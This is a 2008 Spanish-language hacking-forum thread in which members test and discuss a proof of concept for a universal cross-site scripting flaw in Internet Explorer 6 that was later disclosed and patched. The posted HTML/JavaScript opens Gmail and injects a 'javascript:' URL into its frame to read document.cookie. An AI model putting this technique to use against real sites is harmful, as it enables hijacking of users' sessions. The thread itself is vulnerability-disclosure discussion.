elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
14 Febrero 2012, 05:58  


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  [°] UXSS en IE6
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [°] UXSS en IE6  (Leído 2,468 veces)
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.946


Lavando Platos


Ver Perfil WWW
[°] UXSS en IE6
« en: 26 Mayo 2008, 06:34 »

deben tener sesión en gmail.
Código
<html>
<head>
</head>
<body>
<script type="text/javascript">
var x=window.open("http://mail.google.com/");
setInterval(function(){
  x.frames[0].location={toString:function(){return 'javascript:alert(document.cookie);';}};
},5000);
</script>
</body>
</html>
 

Aveces funciona y aveces no, no sabemos porque.. si les sirve pongan su version de IE6 porfavor (ayuda->acerca de).

ehm, es privado.. para los chavos de elhacker.net xD que quede asi sale? ;)

Saludos!!
« Última modificación: 25 Septiembre 2008, 15:00 por sirdarckcat » En línea

sch3m4
Colaborador
***
Desconectado Desconectado

Mensajes: 1.603

Nihil est in intelectu quod prius not fuerit insen


Ver Perfil WWW
Re: Alguien puede probar esto en IE6?
« Respuesta #1 en: 26 Mayo 2008, 15:32 »

funciona, versión: 6.0.2XXXX  :)
« Última modificación: 7 Septiembre 2008, 20:27 por sirdarckcat » En línea

OpenSec

"Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.(..
Azielito
no es
CoAdmin
***
Desconectado Desconectado

Mensajes: 9.085


>.<


Ver Perfil WWW
Re: Alguien puede probar esto en IE6?
« Respuesta #2 en: 26 Mayo 2008, 16:28 »

6.0.2XXXX :xD
:D
« Última modificación: 7 Septiembre 2008, 20:28 por sirdarckcat » En línea
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.946


Lavando Platos


Ver Perfil WWW
Re: Alguien puede probar esto en IE6?
« Respuesta #3 en: 29 Junio 2008, 10:37 »

Se hizo público

Detalles aquí:
https://foro.elhacker.net/noticias/vulnerabilidad_crossdomain_en_internet_explorer_6-t218428.0.html
En línea

sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.946


Lavando Platos


Ver Perfil WWW
Re: Alguien puede probar esto en IE6?
« Respuesta #4 en: 29 Junio 2008, 23:22 »

tururu

aun no es arreglado, me mandarán el parche unos dias antes de que salga.. si me quieren ayudar a probarlo sería genial

Saludos!!
« Última modificación: 9 Septiembre 2008, 14:49 por sirdarckcat » En línea

sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.946


Lavando Platos


Ver Perfil WWW
Re: UXSS en IE6
« Respuesta #5 en: 7 Septiembre 2008, 20:23 »

Lo siento, no fue posible mostrarles el parche, :( voy a mover el mensaje a bugs y exploits.. ya no hay info "privada".. el parche funciona bien :)

Saludos!!
« Última modificación: 7 Septiembre 2008, 20:28 por sirdarckcat » En línea

berz3k
Moderador
***
Desconectado Desconectado

Mensajes: 1.127



Ver Perfil
Re: UXSS en IE6
« Respuesta #6 en: 8 Septiembre 2008, 14:51 »

En efecto la vulnerabilidad no afecta versiones IE 7 ,
Mucho alborto para una version vieja de IE XD

Código:
Version: 7.0..57.30.11






-berz3k.
En línea
Trancek

Desconectado Desconectado

Mensajes: 29


Ver Perfil WWW
Re: UXSS en IE6
« Respuesta #7 en: 8 Septiembre 2008, 22:50 »

bonito bug pero no hay que ser malos...xD!!! x cierto no tapes a crackslatinos jejeje
En línea

berz3k
Moderador
***
Desconectado Desconectado

Mensajes: 1.127



Ver Perfil
Re: UXSS en IE6
« Respuesta #8 en: 9 Septiembre 2008, 09:36 »

Yep, pero luego la publicidad sin permiso, se espantan los jefes.

-berz3k.
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines